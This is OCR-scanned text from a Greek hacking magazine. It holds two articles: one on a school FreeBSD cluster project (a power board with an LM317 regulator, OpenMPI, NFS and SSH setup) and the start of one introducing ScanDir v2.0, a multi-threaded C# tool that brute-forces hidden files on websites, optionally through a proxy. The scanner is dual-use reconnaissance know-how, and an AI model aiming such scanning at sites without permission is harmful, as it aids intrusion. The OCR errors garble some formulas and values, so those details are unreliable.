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Όπως παρατηρείτε, το σύστημα θα διαθέτει κι έναν µεγάλο ανεμιστήρα για την 
ψύξη όλωντων µητρικών. Δεν είναι τόσο ότιτο χρειάζεται, αλλά πού ξανακούστηκε 
cluster χωρίς ενεργή ψύξη (και κατασκευή σε plexiglass χωρίς φωτάκια — εννοείται 
ότι πρόκειται για φωτιζόμενο ανεμιστήρα). Ας δούµε όµως λίγο και την πλακέτα 
διανομής τροφοδοσίας. 


Εικόνα 3. Το UPB πριν τη συναρµολόγησή του. Πρόκειται για ша απλή πλακέτα, αφού τα μόνα 
ενεργά εξαρτήματα που έχει είναι το κύκλωμα του σταθεροποιητή LM317 που τροφοδοτεί то 
switch. Ката та άλλα είναι απλές γραµµές μεταφοράς ρεύματος. 


Unified Power Board 


Μπορεί το όνοµα να εἶναι ψαρωτικό, όμως στην πραγματικότητα πρόκειται για µια 
απλή κατασκευή: H κεντρική παροχή 24pin απὀ το ΑΤΧ τροφοδοτικό συνδέεται 
πάνω στην πλακέτα από την οποία διακλαδίζεται σε τρεις 20pin παροχές (οι µητρι- 
κές µας δεν ἔχουν πρόβλημα να λειτουργήσουν και χωρίς τα προαιρετικά 4 έξτρα 
pins που εἶναι πλέον ro standard). Από όλες τις μητρικές, µόνο η παλιότερη Atom 
motherboard χρειάζεται επίσης το χωριστό βύσμα 4 pin 12 Volt, οπότε δεν εἶναι απα- 
ραίτητο να διακλαδώσουµε το συγκεκριµένο. 


Στην εικόνα 3 µπορείτε να δείτε την πλακέτα πριν τη συναρμολόγηση της, ενώ στην 
εικόνα 4 θα την παρατηρήσετε να...κρέμεται στο πλάι των compute nodes, καθώς 
στην κυριολεξία κρατιέται από τα καλώδιά της. Με την ολοκλήρωση της κατασκευ- 
ής апо plexiglass, η πλακέτα θα βιδωθεί σε κάποιο πλαϊνό στήριγμα. Είπαμε να Ká- 
vouue floating point υπολογισμούς, όχι floating PCBs! 


Πα να sipaoTe ruo πλήρεις, βέβαια, δείτε ολόκληρο το σχηµατικό της πλακέτας, 
στην εικόνα 5. Τα µόνα ενεργά εξαρτήµατατης πλακέτας εἶναι το κύκλωμα παραγω- 
γής σταθεροποιηµένης τάσης 7.5 Volts, апо ra 12 Volts του τροφοδοτικού µέσω του 
σταθεροποιητή LM317 που φαίνεται στην πάνω δεξιά γωνία. Στο εμπόριο κυκλοφο- 
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ρούν διάφοροι ἐτοιμοι σταθεροποιητές 
που µας επιτρέπουν va παράγουµε μία 
σταθεροποιηµένη τάση απὀ µία άλλη. 
Μία γνωστή σειρά σταθεροποιητών 
είναι οι LM78XX, όπου ro ХХ δίνει την 
τάση εξόδου. Πα παράδειγµα, ένας στα- 
θεροποιητής LM7805 δίνει τάση εξόδου 
5V, évac 7812 δίνει 12V κι ένας 7875 δίνει 
τάση 7.5V (όχι 75). Υπάρχουν επίσης και 
οι ρυθµιζόµενοι σταθεροποιητές, όπως 
το μοντέλο LM317 που χρησιμοποιήσα- 
ре, στο οποίο ρυθµίζουμε την τάση εξό- 
боо µε το λόγο δύο αντιστάσεων. Στο 
σχήμα µας, πρόκειται για τις αντιστά- 
σεις В, και Η,. 


Γενικά, για τον υπολογισμό των δύο 
αντιστάσεων η τιμή της αντίστασης В, 
θα πρέπει να εἶναι περίπου 2400, ενώ o 
υπολογισμός της R. µπορεί να γίνει апо 
τον τύπο 


Εικόνα 4. Το UPB κρέμεται ανάμεσα στις μητρικές. Ευτυχώς = 
δεν είναι βαρύ! Nos - 1.25 (1 E В /В,) ш |р) RI 


То 1,,, είναι το ρεύμα που διαρρέει τον ακροδέκτη Adj του ολοκληρωμένου κυκλώ- 
ματος. Αυτό γενικά είναι αµελητέο (50 έως 1ООрА) και µε ασφάλεια μπορούμε να 
θεωρήσουμε ότι είναι μηδέν. Έτσι, λύνοντας τη σχέση ως προς R. έχουµε: 


А = (V 


1 


- 1.25) R, / 1.25 


out 


Οι πυκνωτές που υπάρχουν στο κύκλωμα είναι γιατην εξομάλυνση της τάσης εξό- 
боо, αλλά και τη µείωση των παρασιτικὠν συχνοτήτων που εμφανίζονται στο κύ- 
κλωμα της τροφοδοσίας του όλου του συστήµατος. 


Όταν το σύστημα σβήσει, οι τάσεις των πυκνωτών που παραμένουν έως ότου αυτοί 
αποφορτιστούν, εἶναι δυνατόν να δημιουργήσουν ανάστροφη κατάσταση ото σταθε- 
ροποιητή, π.χ., 7.5V στην ἐξοδο апо την παραµένουσα τάση του C, ενώ στην εἰσοδό 
TOU να είναι μηδενισμένη λόγω του ότι το τροφοδοτικό έχει απενεργοποιηθεί. To 
αποτέλεσµα θα εἰναι να υπάρξουν ανάστροφα ρεύματα µέσα στο σταθεροποιητή, 
µε κίνδυνο την καταστροφή του. Αυτός εἰναι kat ο λόγος ύπαρξης των δύο διόδων 
D, και D,. Αυτές οδηγούν το φορτίο των πυκνωτών στην είσοδο, παρακάμπτοντας 
τα εσωτερικά κυκλώματα TOU σταθεροποιητή και ουσιαστικά προστατεύοντάς TOV. 
Όχι παίζουμε! 
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Εικόνα 5. To σχηµατικό διάγραμμα του UPB. Πάνω δεξιά το 
κύκλωμα του σταθεροποιητή 7.5Volts µε то LM317. 


Aiolos Project Software, µέρος 2 


Από τις απλές µας σημειώσεις (http://aiolos.freebsdworld.gr/sites/default/files/ 
install101.pdf) έχουμε ήδη εγκαταστήσει то βασικό σύστημα του FreeBSD και στις 
τρεις μητρικές. Ката τη διάρκεια της εγκατάστασης παρατηρήσαµε τα ακόλουθα: 


1. 


Στις δύο νέες μητρικές Asrock Q1900b-ITX η κάρτα ήχου δεν λειτουργούσε 
μέχρι να κάνουμε κάποιες αλχημείες (περιγράφονται oro http://freebsdgr. 
blogspot.gr/2015/01/freebsd-on-intel-bay-trail-motherboard.html). Φυσικά οι 
κάρτες ήχου είναι αδιάφορες για ro Aiolos, αλλά κάποια στιγµή οι μητρικές Ва 
χρησιμοποιηθούν αλλού kat TO θέµα έπρεπε να διερευνηθεί ) 


Δεν υπάρχει τη δεδομένη στιγµή κατάλληλος Xorg driver oro FreeBSD Ports 
Collection, yta To συγκεκριµένο Intel HD chipset. Έτσι, то περιβάλλον γραφικών 
δεν µπορεί να τρέξει παρά µόνο µε rov VESA driver. Λεπτομέρεια: Ta compute 
nodes δεν ἔχουν περιβάλλον γραφικών, αλλά διαβάστε ξανά то 1. 


Н μητρική ue rov Atom (Intel D525MW) δεν έχει θέμα µε τα παραπάνω αλλά 
αρνείται πεισματικά να κάνει boot οτιδήποτε έχει СРТ partitions. M αυτό και 
χρησιμοποιήσαμε standard MBR partitions. 


To Acer laptop του γράφοντα τρέχει FreeBSD άψογα, συμπεριλαμβανομένου 
του περιβάλλοντος γραφικών. Υποστηρίζει δε τον ελεγκτή Ethernet, εκεί- 
vov γιατην ασύρματη δικτύωση, καθώς κι αυτόν του ήχου. Επίσης, κάνει boot 
μέσω UEFI. H εγκατάσταση του FreeBSD έγινε ре ro αντίστοιχο UEFI memstick 
image, To οποίο µπορείτε να βρείτε, π.χ., στο ftp://ftp.otenet.gr/pub/FreeBSD/ 
releases/ISO-IMAGES/10.1/FreeBSD-10.1-RELEASE-amd64-uefi-memstick. 
img 
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Όμως η βασική εγκατάσταση του FreeBSD, απὀ µόνη της δεν αρκεί; Χρειάζεται να 
εγκαταστήσουμε και µια σειρά апо προγράµµατα στα compute nodes, καθώς και να 
κάνουμε τις απαραίτητες ρυθμίσεις. Σε γενικές γραμμές: 


* Εγκαθιστούµε τα απαραίτητα προγράµµατα κονσόλας ora compute nodes 
(bash, zip, unzip, unrar, screen, sudo) και κάνουμε τις απαραίτητες ρυθμίσεις 
όπως, αναφέρονται στις εισαγωγικές σημειώσεις. 


* Εγκαθιστούµε το ΟΡΕΠΜΡΙ και πραγματοποιούµε ορισμένες απαραίτητες puð- 
μίσεις. Κατ’ αρχάς τα εκτελέσιμα του OpenMPI δεν εἶναι oro path και πρέπει 
va To προσθέσουμε oro ~/.profile тоо χρήστη. Πρέπει ακόµα να δημιουργήσου- 
µε éva συμβολικό δεσμό του προγράµµατος orted, oro /usr/local/bin. To orted 
είναι υπεύθυνο για την εκκίνηση του προγράµµατος στα compute nodes, όταν 
ξεκινήσουμε την εκτέλεσή του ото master node. 


* Па ro Aiolos cluster αποφασίσαμε va παράσχουµε τη δυνατότητα εκτέλεσης 
προγραμμάτων *kat* σε Python. Προφανώς είναι λίγο παράδοξο va εκτελούμε 
interpreted γλὠσσα σε cluster —n ταχύτητα δεν θα εἰναι και η καλύτερη- αλλά 
ας µην ξεχνάμε τον εκπαιδευτικό σκοπό rou πράγµατος (8a είναι κάπως πιο 
εύκολο να εξηγούμε τα προγράµµατα στους µαθητές). Οπότε πρέπει να εγκα- 
ταστήσουµε ro mpi4py, τη βιβλιοθήκη για διασύνδεση του ΟΡΕΠΜΡΙ µε την 
Python. Ma va γίνει αυτό πρέπει να εγκαταστήσουµε то pip utility. 


Στο master node κάνουμε όλα ra προηγούμενα, αλλά εγκαθιστούµε ακόµα περιβάλ- 
λον γραφικών καθώς και το πρόγραµµα wxGlade, προκειµένου να δημιουργήσουμε 
(μελλοντικά) µια εφαρµογή γραφικών µε τη βιβλιοθήκη wx. (Οι παλιοί αναγνώστες 


Εικόνα 6. H εγκατάσταση rou master node. Ακόμα εφιάλτες βλέπει о 
μαθητής µας, µε τόσες ακατάληπτες εντολές που πληκτρολόγησε :) 
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θα τη θυμούνται: Την έχουµε χρησιμοποιήσει στη σειρά άρθρων προγραμματισμού 
γραφικών µε Python, η οποία ξεκινά από το τεύχος 012 του deltaHacker). Επιπλέον, 
έχουµε να φροντίσουμε και για та ακόλουθα. 


* Na δημιουργήσουμε éva κοινόχρηστο κατάλογο στο master node και να τον 
προσαρτήσουµε σε όλα ra nodes. O ευκολότερος τρόπος εἶναι µέσω TOU OU- 
τήµατος NFS. 


* Na εξασφαλίσουµε ότι όλα τα μηχανήματα γνωρίζονται μεταξύ τους µε τα 
оудрата тоос: о απλούστερος τρόπος vta va γίνει αυτό είναι va τροποποιήσου- 
ре το αρχείο /etc/hosts και να ro διανείµουµε σε όλα τα nodes. Αυτό βέβαια 
προὐποθέτει στατικές διευθύνσεις IP για όλα ra nodes. Έχοντας χρησιµοποι- 
ήσει δυναμικές διευθύνσεις στην αρχική εγκατάσταση, πρέπει τώρα να τις 
αλλάξουμε επεµβαίνοντας ora /etc/rc.conf και /etc/resolv.conf. 


* Πρέπει va παράγουµε κλειδιά SSH στο master node, ὥστε να µπορεί va συνδέ- 
εται µε ra compute nodes αυτόματα και χωρίς χρήση κωδικού (Σ.Ε. Δείτε και 
το http://deltahacker.gr/actsubs-openssh-secure-passwordless-logins). Κανο- 
νικά τα κλειδιά πρέπει να αντιγραφούν σε όλα ra nodes αλλά στην περίπτωσή 
μας δεν χρειάζεται, καθώς ο κατάλογος του χρήστη είναι ήδη κοινόχρηστος 
και προσαρτάται κατά την εκκίνηση από όλα τα compute nodes. Λεπτομέρεια: 
πρέπει να εκκινήσουµε πρώτα το master node και μετά τα compute nodes. О 
τερματισμός πρέπει να γίνει µε ανάποδη σειρά. 


Έχετε ήδη ζαλιστεί апо όλες αυτές τις ρυθμίσεις; Μη τρελαίνεστε. Μπορεί- 
τε να τα διαβάσετε όλα αναλυτικά στο τρίτο μέρος των σημειωσεών рос: 
http://aiolos.freebsdworld.gr/sites/default/flles/aiolos2.pdf 


Εγκατάσταση και πρώτη δοκιμή 


Στις 12/03/2015, στις 11:45 το πρωί, στο εργαστήριο του σχολείου μαζεύτηκε όλη 
η ομάδα του Aiolos Project για την τελική σύνδεση και πρώτη δοκιμή του cluster. Н 
ημερομηνία δεν επιλέχθηκε τυχαία: το 12 εἶναι ο τυχερός αριθµός του γράφοντα 
και η επόµενη pépa ήταν Παρασκευή και 13. Μερικές φορές είναι καλύτερα να µην 
προκαλούμε τη τύχη μας :) 


Με τρεις μητρικές σε éva τροφοδοτικό υπάρχει και το ενδιαφέρον πρόβλημα тпс 
ενεργοποίησής τους. O γράφων eixe προβλέψει να ρυθμίσει апо πριν το BIOS και 
στις τρεις, WOTE να ενεργοποιούνται αυτόματα µε την παροχή ρεύματος (επιλογή 
PWR after power fail: Always on). Συνδέθηκε το UPB και -αφού κρατήσαµε όλοι την 
ανάσα µας-- ενεργοποιήθηκε το τροφοδοτικό. Ευτυχώς δεν είδαμε καπνό, ενώ τα 
beep που ακούστηκαν µας επιβεβαίωσαν ότι τα compute nodes ξεκίνησαν. Συνδέσα- 
µε οθόνη και πληκτρολόγιο σε éva από αυτά kat µε ικανοποίηση το είδαμε va εκκινεί 
κανονικά το FreeBSD. 


Δώσαμε το πληκτρολόγιο σε ένα μαθητή, ενώ ταυτόχρονα προβάλλαμε την οθόνη 
του µέσω TOU projector. H ораба тшу μαθητών ανέλαβε εναλλάξ va κάνειτις ρυθµί- 
σεις σε κάθε compute node, κάνοντας ssh ато ro ένα node στο άλλο. 
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To laptop µε ro master node το ανέλαβε αποκλειστικά o μαθητής µας Μανώλης 
Βεργεράκης, ο οποίος ανέλαβε και το δύσκολο έργο να κάνει όλες τις ρυθμίσεις 
του (NFS, SSH κ.ά). Μετά апо περίπου 2.30 ώρες το εγχείρημα εἶχε ολοκληρωθεί. 
Ύστερα από μερικές δοκιμές και µια επανεκκίνηση των compute nodes, διαπιστώ- 
cape órt то NFS και To SSH λειτουργούσαν κανονικά και εκτελέσαμε µε επιτυχία TO 
hellompi.py, σε 14 πυρήνες. Aiolos Project went Live! 


Επόμενα Βήματα 


Μένει ακόµα να γράψουμε προγράµµατα για το cluster! Προφανώς, δεν το φτιά- 
tape για να τρέξουµε ro hellompi. Δεν έχουμε βέβαια πολύ χρόνο: το Aiolos 
Project θα παρουσιαστεί αρχές Απριλίου στην ἐκθεση μαθητικής δημιουργίας 
(http://ekthesi-mathitikis-dimiourgias.blogspot.gr). Φυσικά έχουµε ακόµα και την 
ολοκλήρωση της συναρμολόγησης µε To plexiglass. Είμαστε όµως πολύ αισιόδοξοι, 
καθώς διαθέτουμε ήδη éva cluster που λειτουργεί. 


Παρακολουθήστε και εσείς την εξέλιξη του πρότζεκτ στη σελἰδα µας oro Facebook 
(https://www.facebook.com/acproject) και φυσικά στην επίσηµη τοποθεσία του εγ- 
χειρήματος (http://aiolos.freebsdworld.gr). Ακόμα καλύτερα, ξεκινήστε και εσείς το 
δικό σας cluster! Σας πάμε µια κόντρα) 


Εικόνα 7. Success! Το Aiolos cluster 
εκτελεί ro hellompi για πρώτη φορά. Ki o 
Μέρφυ πουθενά! 


Skill: Intermediate 
Tags: .NET, C#, programming, threads, directory scanning 


ScanDir v2.0: Ευκαιρία 
για multi-threaded 
programming! 


by Andreas Venieris [aka Thiseas] 


Με το παρόν άρθρο φιλοδοξούμε να πετύχουμε δύο npáypara: (a) va δείξουµε 
πώς φτιάχνεται ένας Web Crawler, δηλαδή ένα πρόγραµµα αναζήτησης 
κρυμμένων αρχείων στο Web, και (В) να συζητήσουμε тоос ακριβώς rov 
δημιουργήσαμε, περιγράφοντας συγκεκριµένα προβλήματα που αντιµετωπίσαµε 
καθώς και τον τρόπο που τα αντιµετωπίσαμε προγραμματιστικά. 


Να τονίσουμε ευθύς εξ αρχής ότι δεν µας ενδιαφέρει µια ξερή παράθεση εντολών. 
Πολύ περισσότερο, σκοπεύουµε να κάνουμε µια τεχνική συζήτηση περί rou про- 
γραμματισμού γενικότερα και περί των σχετικών εργαλείων που µας παρέχονται. 
Μάλιστα, αυτό που τελικά θα θέλαμε είναι αυτός o νέος Web Crawler που Өа сас δώ- 
σουµενα αποτελέσει κάτι σαν "παράπλευρη συνέπεια” της όλης συζήτησης, υπό την 
έννοια ότι θα επιθυμούσαμε να εστιάσουµε περισσότερο ото "пос" пара OTO "TU. 


Επειδή βέβαια είμαστε και άνθρωποι της πράξης, θα δώσουμε το εκτελέσιμο, TOV 
πηγαίο κώδικα, καθώς κι ένα ακόµα απαραίτητο βοηθητικό αρχείο (Oa та δούμε όλα 
αυτά σε λίγο), ὥστε va τα κάνετε ότι εσείς θέλετε. Το πρόγραµµα έχει γραφτεί σε 
C£, στο δωρεάν Visual Studio 2013 Community Edition και απαιτεί την παρουσία του 
.NET 4.5. 


‚МЕТ: Φίλος ή εχθρός; 


Πριν καταλήξουμε va χωρίζουµε τα εργαλεία σε φιλικά και εχθρικά, οφείλουμε να 
πούμε ότι ο τίτλος αυτής της παραγράφου εἰναι λάθος - ἡ καλύτερα "μαρκετίστι- 
кос". То .NET είναι éva εργαλείο προγραμματισμού. Τα εργαλεία δεν μορούν να είναι 
φιλικά ή εχθρικά προς τον άνθρωπο, αλλά µόνο η χρήση τους µπορεί va χαρακτηρι- 
στεί ἐτσι ή αλλιώς. Σε γενικές γραμμές, κατά την άποψη του γράφοντατο.ΝΕΤ ano- 
τελεί µια προσπάθεια της Microsoft επιεικώς...άριστη. Σχετικά πρόσφατα, μάλιστα, 
ο κώδικας rou .NET διατέθηκε στην κοινότητα του Open Source µέσω rou GitHub. 
(Διαβάστε περισσότερα και στο επίσημο blog: http://blogs.msdn.com/b/dotnet.) 
Πρακτικά, µε ro .NET µπορεί κάποιος у αναπτύσσει εφαρμογές για την πλατφόρμα 
που επιθυμεί (Windows, Linux, Android k.á.). 
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Θέλουμε στο σηµείο αυτό να επισηµάνουµε ότι δεν αγαπάµε τα στερεότυπα ("п κα- 
Klá Microsoft", "η καλή Java" κ.ο.κ.) Γενικά, προσπαθούμε шотє η άποψή µας να µην 
εἶναι εξαρτημένη апо τη роба ή από την όποια ανάγκη va ανήκουµε κάπου. Αντίθετα, 
προσπαθούμε WOTE η οπτική µας να εἶναι τεχνολογική ή/και επιστημονική -- και 
ουχί οικονομική :) Υπό αυτό το πρίσμα, θα παραδεχτούμε οτι ro .NET έδωσε µια 
ώθηση στον τοµέα της ανάπτυξης λογισμικού -για το γράφοντα όχι απλά ώθηση, 
αλλά δυνατή κλωτσιά-, εννοείται προς το καλύτερο. Μάλιστα τα θετικά του .NET 
αφορούν τόσο στην ασφάλεια, боо και στο performance. Επίσης, θεωρούμε κακή 
επιλογή (για πολλούς λόγους, τόσο επιστημονικούς боо και επαγγελματικούς)τονα 
μη διδάσκεται το συγκεκριµένο περιβάλλον ανάπτυξης σε πολλά τμήματα πληρο- 
φορικής των Ελληνικών Πανεπιστημίων. Πα να απαντήσουμε λοιπόν στο ψευτο-ε- 
ρώτημα µας, πιστεύουμε ότι то .NET είναι καρα-φίλος! 


Λειτουργικότητα και χαρακτηριστικά 


Na αναφέρουμε бт, κάποτε, σε éva παράλληλο σύμπαν, είχε δημοσιευτεί το ScanDir 
v.1.0, µια παλαιότερη version rou προγράμματός µας, το οποίο είχε λιγότερα xapa- 
κτηριστικά σε σύγκριση µε τη σημερινή ἐκδοση. Πα να µην πολυλογούμε, αρκεί να 
πούμε ότι η έκδοση 2 εἶναι -το παραδεχόµαστε- αισθητά βελτιωμένη. Όμως τι 
ακριβώς κάνει το πρόγραμμα; Στην εἰσοδό του δέχεται ένα λεξικό µε ονόματα ap- 
χείων καθώς κι éva URL, κι ακολούθως εξετάζει αν τα αρχεία αυτά υπάρχουν στο 
υπό εξέταση site (που καθορίζεται από το URL). Ένα αντίστοιχο, πολύ γνωστό πρό- 
үрарра που κάνει παρόμοια δουλειά, είναι το DirBuster. Ταλεξικάτου µπορείτενατα 
χρησιμοποιείτε και µε το ScanDir v2.0, αρκεί να έχετε διαγράψει τις αρχικές γραμ- 
μές µε τα σχόλια (είναι οι γραμμές που αρχίζουν µε το χαρακτήρα 8). Πα την ευκολία 
σας, θα σας δώσουμε ένα λεξικό µε 225000 περίπου ονόματα, WOTE να κάνετε πιο 
άνετατις πρὠτες δοκιμές σας. Εννοείται, περιττό να σημειώσουμε, ότι µπορείτε va 
δημιουργήσετε και τα δικά σας λεξικά. 


* Τανέα προχωρημένα χαρακτηριστικάτου ScanDir v2.0, τα οποία θα αναλυθούν 
στις επόμενες παραγράφους, εἶναι τα ακόλουθα: 

* Χρήση πολλαπλών threads, το πλήθος των οποίων ορίζεται δυναμικά апо то 
χρήστη 

* Τα αρχεία rou dictionary, όταν αυτό ανοιχτεί, μοιράζονται (ката το δυνατόν 
ομοιόμορφα) στα N threads κι εκτελούνται παράλληλα ή σχεδόν παράλληλα 
(θα μιλήσουμε γι αυτό) 

* Οχρήστης έχει τη δυνατότητα να ορίσει κάποιον proxy, µέσω του οποίου θα 
ελεγχθεί το site (ἔτσι, θα κρύψει την πραγματική δημόσια διεύθυνση ΙΡ του 
υπολογιστή του). 

* Γίνεται χρήση συγκεκριμένων χαρακτηριστικών (εντολών) του ΝΕΤ, ώστε να 
αποφεύγονται προβλήµατα επικάλυψης (και άρα µη σωστής λειτουργίας) των 
πολλαπλών threads. 

* O χρήστης ορίζει ποιο θα είναι ro extension των προς έλεγχο αρχείων (π.χ. 
.php, .asp, .aspx κ.ά.) Έτσι, είναι δυνατόν να ελέγχονται sites σε PHP, ASP, ASP. 
ΝΕΤ κ.ο.κ. 
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Ότι δεν σας αρέσει στο πρόγραµµα, µπορείτε να TO αλλάξετε. Επίσης, έχετε τη ÕU- 
νατότητα να του προσθέσετε νέα χαρακτηριστικά. Από τη στιγµή που θα διαθέτετε 
τον πηγαίο κώδικα, εννοείται πως µπορείτε va κάνετε ότι θέλετε. 


Τα threads και η χρήση τους 


H έννοια των threads αποτελεί κλασικό advanced topic στη βιβλιογραφία пері npo- 
γραμματισμού. Περιττό να πούμε ότι δε νοείται επιστήμονας ñ επαγγελματίας mpo- 
γραμματιστής που να µη γνωρίζει περί των threads και πως µπορεί va τα χειριστεί. 
Πρέπει όµως να σημειώσουμε ότι ra threads είναι και κάτι σαν taboo για τους про- 
γραμματιστές. Γενικά αποφεύγονται, αφού αρκετές φορές ro debugging ενός mpo- 
γράμματος µε πολλά threads είναι апо εφιαλτική έως ακατόρθωτη εργασία. Μολα- 
ταύτα, éva πρὀγραµµα που κάνει σωστή χρήστη των threads αποδεικνύεται χρήσιμο 
στην πράξη — και ξεχωρίζει. 


Γενικά, καλό είναι να γνωρίζουμε τα ακόλουθα. Τη στιγµή που εκτελείται éva πρό- 
γραμμα σε .NET, δημιουργεί ένα process στη μνήμη (για να ro πούμε απλά) και µέσα 
σε αυτό δεσμεύεται κι éva default thread. Το πρόγραμμά µας τρέχει 'μέσα' σε αυτό 
TO thread. Στην ουσία, το λειτουργικό σύστημα εἰναι αυτό που φτιάχνει то εν λόγω 
process, σε συνεργασία µε την εικονική μηχανή (virtual machine, VM — στην περί- 
πτωσή µας υλοποιείται апо ro .NET). Μέσα σε κάθε process μπορούν να τρέχουν 
éva ή περισσότερα threads. Συνήθως, στα απλά και μικρά προγράµµατα, ro thread εἰ- 
ναι ένα. Είναι αυτό που φιλοξενεί τόσο τις συναρτήσεις που φτιάχνουμε εμείς, όσο 
κι αυτές που απαιτεί και χρησιμοποιεί ro UI (User Interface) λόγω της χρήσης των 
components (που επίσης βάζουμε εμείς) Επειδή οι συναρτήσεις και τα components 
του Ul μοιράζονται ro (Oto thread, έχουµε το περίφημο φαινόμενο του "паүшратос" 
του προγράµµατος που εκτελεί κάποια "βαριά" (πείτε τη και χρονοβόρα) εργασία, 
апо µια συνάρτηση που έχουμε φτιάξει. Πολλοί θα έχετε παρατηρήσει το περίφημο 
μήνυμα "Not Responding", στον Task Manager των Windows, καθώς και το "ξάσπρι- 
ора" του παραθύρου, που βασικά σημαίνει "un µε αγγίζεις, κάνω κάτι άλλο". 


Το φαινόμενο μπορούμε να το ξεπεράσουμε βάζοντας σε éva άλλο (ή σε άλλα) 
thread(s) τις συναρτήσεις που απαιτούν επεξεργασία, απελευθερώνοντας έτσι το 
Ul. Ωραίο ακούγεται αυτό -και εἶναι- αλλά θέλει λίγο προσοχή και εμπειρία, αφού 
εύκολα µπορεί va χαθεί η μπάλα. Πρέπει va έχουµε υπόψη το εξής: Όταν éva process 
εκτελεί περισσότερα του ενός threads, τότε αυτά εκτελούνται ασύγχρονα και, µερι- 
κές φορές, παράλληλα! Στο παρόν άρθρο µας απασχολεί то "ασύγχρονα΄ και то "па- 
ράλληλα" το αφήνουμε στην άκρη. Δεν εἶναι τώρα ο σκοπός µας να εξηγήσουμε τι 
ακριβώς σημαίνει "rtapaAAnA(a" για ένα VM σε συνεργασία µε το λειτουργικό, πώς 
και πότε υλοποιείται και πόσο ρόλο παίζουν τα περίφημα cores του επεξεργαστή. 
Θεωρήστε, λοιπόν, ότι δεν έχουµε παράλληλη επεξεργασία ή, ισοδύναμα, ὁτι ο επε- 
ξεργαστής µας µπορεί να τρέχει µόνο ένα thread την φορά (για το καλό σας το λέμε 
- πιστέφψτε µας Ὁ) 


Ας εστιάσουµε λοιπόν στο "ασύγχρονα”. O ὀρος σηµαίνει πως αν, T.X, έχουµε 10 
threads που τρέχουν κάτω από ένα process, τη χρονική στιγµή t δεν είναι δυνατόν 
ναγνωρίζουμε ποιο thread απασχολεί τον επεξεργαστή. Ας το δούµε αυτό και μ' ένα 
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παράδειγµα. Έστω ότι έχουµε φτιάξει µια συνάρτηση που λέγεται HeavyWork(a, b, 
C) kat που αποτελείται апо 200 γραμμές κώδικα κι εκτελεί µια πολύ βαριά εργασία. 
Επίσης, έχουµε φτιάξει τη HeavyWork(a, b, c) ἔτσι ὠστε να τρέχει σε 10 threads. Τρέ- 
χουν, δηλαδή, 10 διαφορετικές HeavyWork(a, b, ο) µέσα oro process µας. Κανείς -ua 
κανείς-- δεν µας εγγυάται ότι αυτές θα τρέχουν κατά σειρά (δηλαδή πρώτα η 1n, 
αφού τελειώσει η 2η κ.ο.κ.) Στην πραγματικότητα, θα συμβεί το εξής: Θα ξεκινήσει 
η Ίη και πριν τελειώσει θα διακοπεί και θα ξεκινήσει η 2η και πριν τελειώσει θα 
διακοπεί και θα ξεκινήσει η 3η κο.κ. έως ότου ξεκινήσει η 10η. Επειδή η 10η εἰναι 
η τελευταία, µη νομίζετε ότι δεν θα διακοπεί από κάποια άλλη. Αντιθέτως: Θα δι- 
ακοπεί Ἀκάποια" στιγμή, στε να συνεχίσει κάποια άλλη συνάρτηση -δεν ξέρουμε 
ποια ακριβώς- που είχε σταματήσει πριν και τώρα το λειτουργικό αποφάσισε ότι 
περίμενε αρκετά. 


Σκεφτείτε τώρα λίγο το ακόλουθο σενάριο. Έχουμε τον επεξεργαστή, στο οποίο το 
ΛΣ δίνει και παίρνει εργασίες. Τη στιγµή {του δίνει ro thread 1 κιο επεξεργαστής ap- 
χίζεινα δουλεύει µέσω αυτού του thread. Τη χρονική στιγμή tH του λέει "тарата το 
thread 1 και πιάσε το thread 2". O καημένος ο επεξεργαστής όµως δεν είχε προλάβει 
να τελειώσει όλες τις γραμμές επεξεργασίας της συνάρτησης HeavyWork(a, b,c), 
που τρέχει στο thread 1 κι όπως εἰπαμε έχει 200 γραμμές. Ας πούμε ότι πρόλαβε va 
κάνει τις πρώτες 10 γραμμές. Τα βροντάει όλα, λοιπόν, και πιάνει τη HeavyWork(a, 
b, с) ото thread 2. Σκεφτείτε τώρα κάτι ακόµα πιο σύνθετο: Ότι δεν είμαστε στον 
πρώτο γύρο, αλλά στον τρίτο. M' άλλα λόγια, το λειτουργικό έπιασε το thread 2 και 
το άφησε άλλες δύο φορές πριν, ενώ τώρα το πιάνει για την τρίτη φορά. Θυμάται 
άραγε οεπεξεργαστής σε τι κατάσταση eixe αφήσει τη HeavyWork(a, b, ο) τελευταία 
φορά που δούλεψε то thread 2; Όταν μιλάμε για "κατάσταση", εννοούμε, TX., ότι αν 
ο επεξεργαστής παράτησε τη συνάρτηση τελευταία φορά orn γραμμή 120 και τώρα 
του έρχεται από το λειτουργικό η γραμμή 121, η οποία περιέχει µια μεταβλητή που 
εἶχε οριστεί στη γραμμή 5, θυμάται ο επεξεργαστής την τιμή της ή την έχει µπερ- 
δέψει/ανακατέψει µε την τιµή της ίδιας μεταβλητής, άλλων threads που ήδη έχουν 
τρέξει την ἴδια function; H απάντηση, δυστυχώς, εἶναι αρνητική: δεν θυμάται. Πατην 
ακρίβεια, δεν µπορεί να θυμάται. H τιµή της μεταβλητής θα εἰναι η τιµή που απέδω- 
σε σε αυτή το πιο πρόσφατο thread. Apa, σε µια τέτοια περίπτωση ro πρόγραµµαθα 
δούλευε χαοτικά. 


Υπάρχει άραγε τρόπος WOTE να προστατέψουμε τη συνάρτηση µας και να πούμε 
στο λειτουργικό να µη διακόπτει τη διαδικασία (και να περνά σε άλλο thread), αν 
πρώτα δεν έχει εκτελεστεί πλήρως η συνάρτηση HeavyWork(a, b, с); H απάντηση, 
ευτυχώς, εἶναι θετική: υπάρχει. Πρόκειται για το γνωστό Critical Section, που ση- 
μαίνει ότι μπορούμε να ορίσουμε µια περιοχή κώδικα η οποία θα εκτελείται ή όλη 
ή καθόλου. Όποιος έχει ασχοληθεί µε βάσεις δεδοµένων, θα κατάλαβε ότι n λογική 
είναι η ἴδια µε το περίφημο Isolation Level ñ αλλιώς τον μηχανισμό κλειδώματος 
(βλέπε lock()). Μπορούμε, δηλαδή, va "Aokápoupe'" éva µέρος του κώδικά µας και να 
πούμε πως όταν αυτό τρέχει µέσα o' éva thread, πρέπει οπωσδήποτε να τελειώσει 
*rtpwv* το thread αλλάξει µε κάποιο ἄλλο. Επίσης, η C£ μάς δίνει εντολές ώστε να 
προλαβαίνουµε προβλήματα επικάλυψης µε ro να υποχρεώνουµε το thread N va 
περιμένει να τελειώσει то № «πριν: ξεκινήσει (βλέπε συνάρτηση join()). 
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Όσοι φίλοι ενδιαφέρονται για περισσότερη εμβάθυνση, μπορούν va διαβάσουν το 
σχετικό άρθρο στο MSDN: http://bit.ly/MSDN-Threads-Threading. Επίσης, éva πολύ 
